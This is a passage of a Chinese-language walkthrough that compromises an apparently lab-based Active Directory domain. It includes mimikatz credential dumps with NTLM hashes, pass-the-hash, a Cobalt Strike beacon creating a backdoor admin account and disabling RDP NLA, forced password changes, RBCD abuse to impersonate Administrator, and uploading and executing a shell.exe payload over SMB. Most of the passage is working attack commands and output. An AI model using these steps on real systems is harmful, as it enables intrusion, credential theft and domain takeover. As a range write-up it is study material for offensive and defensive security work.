fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : FPSRVIIS03$
Domain : FPCORP
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-20
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : fpsrviis03$
* Domain : FPCORP.INT
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 29050 (00000000:0000717a)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 29016 (00000000:00007158)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 27795 (00000000:00006c93)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID :
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1485910 (00000000:0016ac56)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 2:45:34
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1484741 (00000000:0016a7c5)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 2:45:34
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1483964 (00000000:0016a4bc)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/11/9 2:45:34
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 321118 (00000000:0004e65e)
Session : Service from 0
User Name : IntraFetch Web Site
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2025/11/9 1:47:33
SID : S-1-5-82-1730752505-4234347734-3256883311-4032060522-3340388024
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : FPCORP.INT
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/11/9 1:44:35
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/11/9 1:44:32
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : FPSRVIIS03$
Domain : FPCORP
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : fpsrviis03$
* Domain : FPCORP.INT
* Password : (null)
ssp :
credman :
cloudap :
mimikatz(commandline) # exit
Bye!
然后唯一能用的就是当前机器用户 FPSRVIIS03$ 的哈希
Username : FPSRVIIS03$
Domain : FPCORP
NTLM : 539d77a83f4a533d0e1b49c82d896690
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# proxychains -q nxc smb 172.22.20.38 -u 'FPSRVIIS03$' -H 539d77a83f4a533d0e1b49c82d896690
SMB 172.22.20.38 445 FPSRVIIS03 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVIIS03) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.38 445 FPSRVIIS03 [+] fpcorp.int\FPSRVIIS03$:539d77a83f4a533d0e1b49c82d896690
6. FPSRVIIS03-2 172.22.20.165
6.1. BypassUAC
上来后,进行信息收集,发现当前用户是本地管理员组的用户,但是因为开启了UAC,导致无法执行一些高权限的操作
[11/10 12:48:27] beacon> shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
[11/10 12:48:27] [*] Tasked beacon to run: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
[11/10 12:48:27] [+] host called home, sent: 135 bytes
[11/10 12:48:28] [+] received output:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
[11/10 12:48:36] beacon> shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
[11/10 12:48:36] [*] Tasked beacon to run: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
[11/10 12:48:36] [+] host called home, sent: 149 bytes
[11/10 12:48:37] [+] received output:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
这里直接用CS插件BypassUAC
这里重新上传前面那个免杀马到一个可写的目录,然后选择BOF这一个利用,等待一会即可上线管理员用户
此插件为别人内部插件,占不分享哈
Bapass成功后,即可发现有当前机器的管理员用户上线了
6.2. hashdump
用管理员用户权限在CS中进行进程注入提取到System
然后抓取明文密码,可以获取到 liu654 的明文密码
FPCORP.INT\liu654 p1Uf^yko@+yHS
验证一下是否正确
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u 'liu654' -p 'p1Uf^yko@+yHS'
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\liu654:p1Uf^yko@+yHS STATUS_PASSWORD_EXPIRED
密码过期了,改下密码
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u 'liu654' -p 'p1Uf^yko@+yHS' -M change-password -o NEWPASS=Admin123
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\liu654:p1Uf^yko@+yHS STATUS_PASSWORD_EXPIRED
CHANGE-P... 172.22.20.25 445 FPSRVAD01 [+] Successfully changed password for liu654
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u 'liu654' -p 'Admin123'
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [+] fpcorp.int\liu654:Admin123
6.3. RDP到172.22.20.165(可选)
如果你想要RDP连接上去的话,直接创建本地管理员用户
[11/10 13:12:30] beacon> shell whoami
[11/10 13:12:30] [*] Tasked beacon to run: whoami
[11/10 13:12:31] [+] host called home, sent: 37 bytes
[11/10 13:12:31] [+] received output:
fpcorp\wang.17
[11/10 13:12:51] beacon> shell net user c2trus Admin123 /add
[11/10 13:12:51] [*] Tasked beacon to run: net user c2trus Admin123 /add
[11/10 13:12:51] [+] host called home, sent: 61 bytes
[11/10 13:12:51] [+] received output:
命令成功完成。
[11/10 13:13:00] beacon> shell net localgroup administrators c2trus /add
[11/10 13:13:00] [*] Tasked beacon to run: net localgroup administrators c2trus /add
[11/10 13:13:01] [+] host called home, sent: 72 bytes
[11/10 13:13:01] [+] received output:
命令成功完成。
然后连接,这里会提示
在CS的beacon中执行下面的命令即可禁用NLA
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 3v&40+k #oqO8 @
然后在你登录之前记得先结束掉当前用户的RDP会话(当前有一个wang.17处于RDP会话)如果你给他挤掉的话,你的机器会重启,这里先在CS的shell中结束掉rdp会话,再登录
shell query session #查看在线用户
shell logoff id #断开用户
7. FPSRVFS02 172.22.20.32
当前用户 LIU654 对 FPSRVFS02 机器有GenericWrite权限,这里可以通过RBCD获取到这台机器的权限
我拿到域控时发现域内也有ADCS,应该也可以进行影子凭据(没试过)
7.1. SMB
目标机器上开放了SMB服务器,且我们的 'FPSRVIIS03$' 用户对其有写入权限,里面全是什么机密资料,但没卵用。
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# proxychains -q nxc smb 172.22.20.32 -u 'FPSRVIIS03$' -H 539d77a83f4a533d0e1b49c82d896690 --shares
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\FPSRVIIS03$:539d77a83f4a533d0e1b49c82d896690
SMB 172.22.20.32 445 FPSRVFS02 [*] Enumerated shares
SMB 172.22.20.32 445 FPSRVFS02 Share Permissions Remark
SMB 172.22.20.32 445 FPSRVFS02 ----- ----------- ------
SMB 172.22.20.32 445 FPSRVFS02 ADMIN$ 远程管理
SMB 172.22.20.32 445 FPSRVFS02 C$ 默认共享
SMB 172.22.20.32 445 FPSRVFS02 filesrv READ,WRITE
SMB 172.22.20.32 445 FPSRVFS02 IPC$ READ 远程 IPC
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# proxychains -q impacket-smbclient 'fpcorp.int/FPSRVIIS03$@172.22.20.32' -hashes :539d77a83f4a533d0e1b49c82d896690
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
filesrv
IPC$
# use filesrv
# ls
drw-rw-rw- 0 Sat Nov 8 14:29:21 2025 .
drw-rw-rw- 0 Thu Jul 3 00:35:32 2025 ..
drw-rw-rw- 0 Thu Jul 3 00:38:32 2025 公司政策_CompanyPolicies
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 各部门_Departments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 培训资料_TrainingMaterials
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 客户文档_ClientDocuments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 用户目录_Users
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 财务报告_FinancialReports
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 软件工具_SoftwareTools
#
7.2. RBCD
利用请看:(RBCD) Resource-based constrained | The Hacker Recipes
RBCD
首先看一下当前域内普通用户可以是否可以创建计算机
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc ldap 172.22.20.25 -u 'liu654' -p 'Admin123' -M maq
LDAP 172.22.20.25 389 FPSRVAD01 [*] Windows Server 2022 Build 20348 (name:FPSRVAD01) (domain:fpcorp.int) (signing:None) (channel binding:No TLS cert)
LDAP 172.22.20.25 389 FPSRVAD01 [+] fpcorp.int\liu654:Admin123
MAQ 172.22.20.25 389 FPSRVAD01 [*] Getting the MachineAccountQuota
MAQ 172.22.20.25 389 FPSRVAD01 MachineAccountQuota: 10
这里为默认配置(允许普通域用户创建10台机器),可以继续进行RBCD
#1 , 创建机器账户
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-addcomputer fpcorp.int/liu654:Admin123 -dc-ip 172.22.20.25 -computer-name hack$ -computer-pass Admin23
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account hack$ with password Admin23.
#2 . 配置 RBCD 权限
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-rbcd fpcorp.int/liu654:Admin123 -delegate-to FPSRVFS02$ -delegate-from hack$ -dc-ip 172.22.20.25 -action write
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] hack$ can now impersonate users on FPSRVFS02$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] hack$ (S-1-5-21-3225782379-1150096479-4236096888-1179)
#3 . 获取机器账户的 TGT
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-getTGT fpcorp.int/hack$:Admin23 -dc-ip 172.22.20.25
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in hack$.ccache
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# export KRB5CCNAME=hack\$.ccache
#4 . 模拟 Administrator 请求服务票据
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-getST -k -no-pass -spn cifs/FPSRVFS02.fpcorp.int fpcorp.int/hack$ -impersonate Administrator -dc-ip 172.22.20.25
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_FPSRVFS02.fpcorp.int @FPCORP.INT.ccache
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# export KRB5CCNAME= Administrator@cifs_FPSRVFS02.fpcorp.int @FPCORP.INT.ccache
# 验证一下
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.32 -u administrator -k --use-kcache
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\administrator from ccache (Pwn3d!)
这里我们可以通过SMB在 FPSRVFS02 上执行命令,但是我没有能直接PTH上去
7.3. 上线FPSRVFS02
上传我们之前的免杀马到目标的SMB服务器上
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-smbclient 'fpcorp.int/FPSRVIIS03$@172.22.20.32' -hashes :ef9128f91d1242e8e9854d265c81b460
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use filesrv
# ls
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 .
drw-rw-rw- 0 Mon Nov 10 02:48:06 2025 ..
drw-rw-rw- 0 Thu Jul 3 00:38:32 2025 公司政策_CompanyPolicies
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 各部门_Departments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 培训资料_TrainingMaterials
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 客户文档_ClientDocuments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 用户目录_Users
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 财务报告_FinancialReports
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 软件工具_SoftwareTools
# put shell.exe
# dir
*** Unknown syntax: dir
# ls
drw-rw-rw- 0 Mon Nov 10 02:53:07 2025 .
drw-rw-rw- 0 Mon Nov 10 02:48:06 2025 ..
-rw-rw-rw- 1713152 Mon Nov 10 02:53:07 2025 shell.exe
drw-rw-rw- 0 Thu Jul 3 00:38:32 2025 公司政策_CompanyPolicies
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 各部门_Departments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 培训资料_TrainingMaterials
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 客户文档_ClientDocuments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 用户目录_Users
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 财务报告_FinancialReports
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 软件工具_SoftwareTools
#
然后看一下这个SMB共享位置在目标服务器什么目录
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.32 -u administrator -k --use-kcache -x 'dir c:\Filesrv' --codec gbk
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\administrator from ccache (Pwn3d!)
SMB 172.22.20.32 445 FPSRVFS02 [+] Executed command via wmiexec
SMB 172.22.20.32 445 FPSRVFS02 驱动器 C 中的卷没有标签。
SMB 172.22.20.32 445 FPSRVFS02 卷的序列号是 5661-41C3
SMB 172.22.20.32 445 FPSRVFS02 c:\Filesrv 的目录
SMB 172.22.20.32 445 FPSRVFS02 2025/11/10 15:53 <DIR> .
SMB 172.22.20.32 445 FPSRVFS02 2025/11/10 15:53 1,713,152 shell.exe
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 11:59 <DIR> 公司政策_CompanyPolicies
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:27 <DIR> 各部门_Departments
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 培训资料_TrainingMaterials
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 客户文档_ClientDocuments
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 用户目录_Users
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 财务报告_FinancialReports
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 软件工具_SoftwareTools
SMB 172.22.20.32 445 FPSRVFS02 1 个文件 1,713,152 字节
SMB 172.22.20.32 445 FPSRVFS02 8 个目录 8,007,426,048 可用字节
发现在 c:\Filesrv 目录下,运行后门,等待上线
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.32 -u administrator -k --use-kcache -x 'c:\Filesrv\shell.exe'
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\administrator from ccache (Pwn3d!)
SMB 172.22.20.32 445 FPSRVFS02 [+] Executed command via wmiexec
7.4. hshdump 获取 svc_bkpadmin
上线后因为这台机器对 svc_bkpadmin 具有HasSession属性,说明这台机器上可以抓到 svc_bkpadmin 留下来的凭据
这里成功抓取到 svc_bkpadmin 用户的明文密码和哈希
验证一下是否正确,发现密码也过期了,更改一下即可
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u svc_bkpadmin -H f2f3e075ca082813f0d8191f947b0e01
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\svc_bkpadmin:f2f3e075ca082813f0d8191f947b0e01 STATUS_PASSWORD_EXPIRED
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
